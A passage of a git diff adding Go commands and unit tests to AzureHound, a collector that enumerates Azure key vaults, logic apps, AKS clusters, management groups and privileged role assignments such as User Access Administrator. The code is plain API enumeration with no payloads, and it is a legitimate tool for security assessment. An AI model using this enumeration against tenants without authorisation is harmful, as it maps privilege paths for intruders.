models.KeyVaultUserAccessAdmin{ + UserAccessAdmin: ra.RoleAssignment, + KeyVaultId: ra.KeyVaultId, + } + }) + + return NewAzureWrapper(enums.KindAZKeyVaultUserAccessAdmin, models.KeyVaultUserAccessAdmins{ + KeyVaultId: ra.Data.KeyVaultId, + UserAccessAdmins: kvContributors, + }) + }) +} diff --git a/cmd/list-key-vault-user-access-admins_test.go b/cmd/list-key-vault-user-access-admins_test.go new file mode 100644 index 0000000..82f7c6e --- /dev/null +++ b/cmd/list-key-vault-user-access-admins_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListKeyVaultUserAccessAdmins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listKeyVaultUserAccessAdmins(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZKeyVaultRoleAssignment, + models.KeyVaultRoleAssignments{ + KeyVaultId: "foo", + RoleAssignments: []models.KeyVaultRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.UserAccessAdminRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.UserAccessAdminRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-key-vaults.go b/cmd/list-key-vaults.go new file mode 100644 index 0000000..8596a4e --- /dev/null +++ b/cmd/list-key-vaults.go @@ -0,0 +1,130 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listKeyVaultsCmd) +} + +var listKeyVaultsCmd = &cobra.Command{ + Use: "key-vaults", + Long: "Lists Azure Key Vaults", + Run: listKeyVaultsCmdImpl, + SilenceUsage: true, +} + +func listKeyVaultsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure key vaults...") + start := time.Now() + stream := listKeyVaults(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listKeyVaults(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating key vaults", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureKeyVaults(ctx, id, query.RMParams{Top: 999}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing key vaults for this subscription", "subscriptionId", id) + } else { + // the embedded struct's values override top-level properties so TenantId + // needs to be explicitly set. + keyVault := models.KeyVault{ + KeyVault: item.Ok, + SubscriptionId: id, + ResourceGroup: item.Ok.ResourceGroupId(), + TenantId: item.Ok.Properties.TenantId, + } + log.V(2).Info("found key vault", "keyVault", keyVault) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZKeyVault, + Data: keyVault, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing key vaults", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all key vaults") + }() + + return out +} diff --git a/cmd/list-key-vaults_test.go b/cmd/list-key-vaults_test.go new file mode 100644 index 0000000..9629d02 --- /dev/null +++ b/cmd/list-key-vaults_test.go @@ -0,0 +1,109 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListKeyVaults(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockSubscriptionsChannel := make(chan interface{}) + mockKeyVaultChannel := make(chan client.AzureResult[azure.KeyVault]) + mockKeyVaultChannel2 := make(chan client.AzureResult[azure.KeyVault]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureKeyVaults(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultChannel).Times(1) + mockClient.EXPECT().ListAzureKeyVaults(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultChannel2).Times(1) + channel := listKeyVaults(ctx, mockClient, mockSubscriptionsChannel) + + go func() { + defer close(mockSubscriptionsChannel) + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + }() + go func() { + defer close(mockKeyVaultChannel) + mockKeyVaultChannel <- client.AzureResult[azure.KeyVault]{ + Ok: azure.KeyVault{}, + } + mockKeyVaultChannel <- client.AzureResult[azure.KeyVault]{ + Ok: azure.KeyVault{}, + } + }() + go func() { + defer close(mockKeyVaultChannel2) + mockKeyVaultChannel2 <- client.AzureResult[azure.KeyVault]{ + Ok: azure.KeyVault{}, + } + mockKeyVaultChannel2 <- client.AzureResult[azure.KeyVault]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.KeyVault); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVault{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.KeyVault); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVault{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.KeyVault); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVault{}) + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-logic-app-role-assignments.go b/cmd/list-logic-app-role-assignments.go new file mode 100644 index 0000000..5af69f2 --- /dev/null +++ b/cmd/list-logic-app-role-assignments.go @@ -0,0 +1,141 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listLogicAppRoleAssignment) +} + +var listLogicAppRoleAssignment = &cobra.Command{ + Use: "logic-app-role-assignments", + Long: "Lists Azure Logic app Role Assignments", + Run: listLogicAppRoleAssignmentImpl, + SilenceUsage: true, +} + +func listLogicAppRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure logic app role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listLogicAppRoleAssignments(ctx, azClient, listLogicApps(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listLogicAppRoleAssignments(ctx context.Context, client client.AzureClient, logicapps <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), logicapps) { + if logicapp, ok := result.(AzureWrapper).Data.(models.LogicApp); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating logic app role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, logicapp.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + logicappRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this logic app", "logicappId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + logicappRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found logic app role assignment", "logicappRoleAssignment", logicappRoleAssignment) + count++ + logicappRoleAssignments.RoleAssignments = append(logicappRoleAssignments.RoleAssignments, logicappRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZLogicAppRoleAssignment, + Data: logicappRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing logic app role assignments", "logicappId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all logic app role assignments") + }() + + return out +} diff --git a/cmd/list-logic-apps.go b/cmd/list-logic-apps.go new file mode 100644 index 0000000..8ce4d95 --- /dev/null +++ b/cmd/list-logic-apps.go @@ -0,0 +1,136 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listLogicAppsCmd) +} + +var listLogicAppsCmd = &cobra.Command{ + Use: "logic-apps", + Long: "Lists Azure Logic Apps", + Run: listLogicAppsCmdImpl, + SilenceUsage: true, +} + +func listLogicAppsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure logic apps...") + start := time.Now() + stream := listLogicApps(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listLogicApps(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating logic apps", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + // Azure only allows requesting 100 logic apps at a time. The previous + // value of math.MaxInt32 was causing issues and not collecting + // logic apps at all. This is not a great fix, since it requires proper + // pagination in case there are more than 100 logic apps, but it's better + // as an interim solution than it was before. + for item := range client.ListAzureLogicApps(ctx, id, "", 100) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing logic apps for this subscription", "subscriptionId", id) + } else { + logicapp := models.LogicApp{ + LogicApp: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found logicapp", "logicapp", logicapp) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZLogicApp, + Data: logicapp, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing logic apps", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all logic apps") + }() + + return out +} diff --git a/cmd/list-managed-cluster-role-assignments.go b/cmd/list-managed-cluster-role-assignments.go new file mode 100644 index 0000000..29713ab --- /dev/null +++ b/cmd/list-managed-cluster-role-assignments.go @@ -0,0 +1,141 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagedClusterRoleAssignment) +} + +var listManagedClusterRoleAssignment = &cobra.Command{ + Use: "managed-cluster-role-assignments", + Long: "Lists AKS Managed Cluster Role Assignments", + Run: listManagedClusterRoleAssignmentImpl, + SilenceUsage: true, +} + +func listManagedClusterRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure managed cluster role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listManagedClusterRoleAssignments(ctx, azClient, listManagedClusters(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listManagedClusterRoleAssignments(ctx context.Context, client client.AzureClient, managedClusters <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), managedClusters) { + if managedCluster, ok := result.(AzureWrapper).Data.(models.ManagedCluster); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating managed cluster role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, managedCluster.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + managedClusterRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this managed cluster", "managedClusterId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + managedClusterRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found managed cluster role assignment", "managedClusterRoleAssignment", managedClusterRoleAssignment) + count++ + managedClusterRoleAssignments.RoleAssignments = append(managedClusterRoleAssignments.RoleAssignments, managedClusterRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZManagedClusterRoleAssignment, + Data: managedClusterRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing managed cluster role assignments", "managedClusterId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all managed cluster role assignments") + }() + + return out +} diff --git a/cmd/list-managed-clusters.go b/cmd/list-managed-clusters.go new file mode 100644 index 0000000..490224b --- /dev/null +++ b/cmd/list-managed-clusters.go @@ -0,0 +1,131 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagedClustersCmd) +} + +var listManagedClustersCmd = &cobra.Command{ + Use: "managed-clusters", + Long: "Lists Azure Kubernetes Service Managed Clusters", + Run: listManagedClustersCmdImpl, + SilenceUsage: true, +} + +func listManagedClustersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure managed clusters...") + start := time.Now() + stream := listManagedClusters(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listManagedClusters(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating managed clusters", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureManagedClusters(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing managed clusters for this subscription", "subscriptionId", id) + } else { + managedCluster := models.ManagedCluster{ + ManagedCluster: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found managed cluster", "managedCluster", managedCluster) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZManagedCluster, + Data: managedCluster, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing managed clusters", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all managed clusters") + }() + + return out +} diff --git a/cmd/list-management-group-descendants.go b/cmd/list-management-group-descendants.go new file mode 100644 index 0000000..3cbcee7 --- /dev/null +++ b/cmd/list-management-group-descendants.go @@ -0,0 +1,121 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupDescendantsCmd) +} + +var listManagementGroupDescendantsCmd = &cobra.Command{ + Use: "management-group-descendants", + Long: "Lists Azure Management Group Descendants", + Run: listManagementGroupDescendantsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupDescendantsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group descendants...") + start := time.Now() + stream := listManagementGroupDescendants(ctx, azClient, listManagementGroups(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupDescendants(ctx context.Context, client client.AzureClient, managementGroups <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), managementGroups) { + if managementGroup, ok := result.(AzureWrapper).Data.(models.ManagementGroup); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating management group descendants", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, managementGroup.Name); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureManagementGroupDescendants(ctx, id, 3000) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing descendants for this management group", "managementGroupId", id) + } else { + log.V(2).Info("found management group descendant", "type", item.Ok.Type, "id", item.Ok.Id, "parent", item.Ok.Properties.Parent.Id) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZManagementGroupDescendant, + Data: item.Ok, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing management group descendants", "managementGroupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all management group descendants") + }() + + return out +} diff --git a/cmd/list-management-group-descendants_test.go b/cmd/list-management-group-descendants_test.go new file mode 100644 index 0000000..3b3e53a --- /dev/null +++ b/cmd/list-management-group-descendants_test.go @@ -0,0 +1,103 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroupDescendants(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockManagementGroupsChannel := make(chan interface{}) + mockManagementGroupDescendantChannel := make(chan client.AzureResult[azure.DescendantInfo]) + mockManagementGroupDescendantChannel2 := make(chan client.AzureResult[azure.DescendantInfo]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() 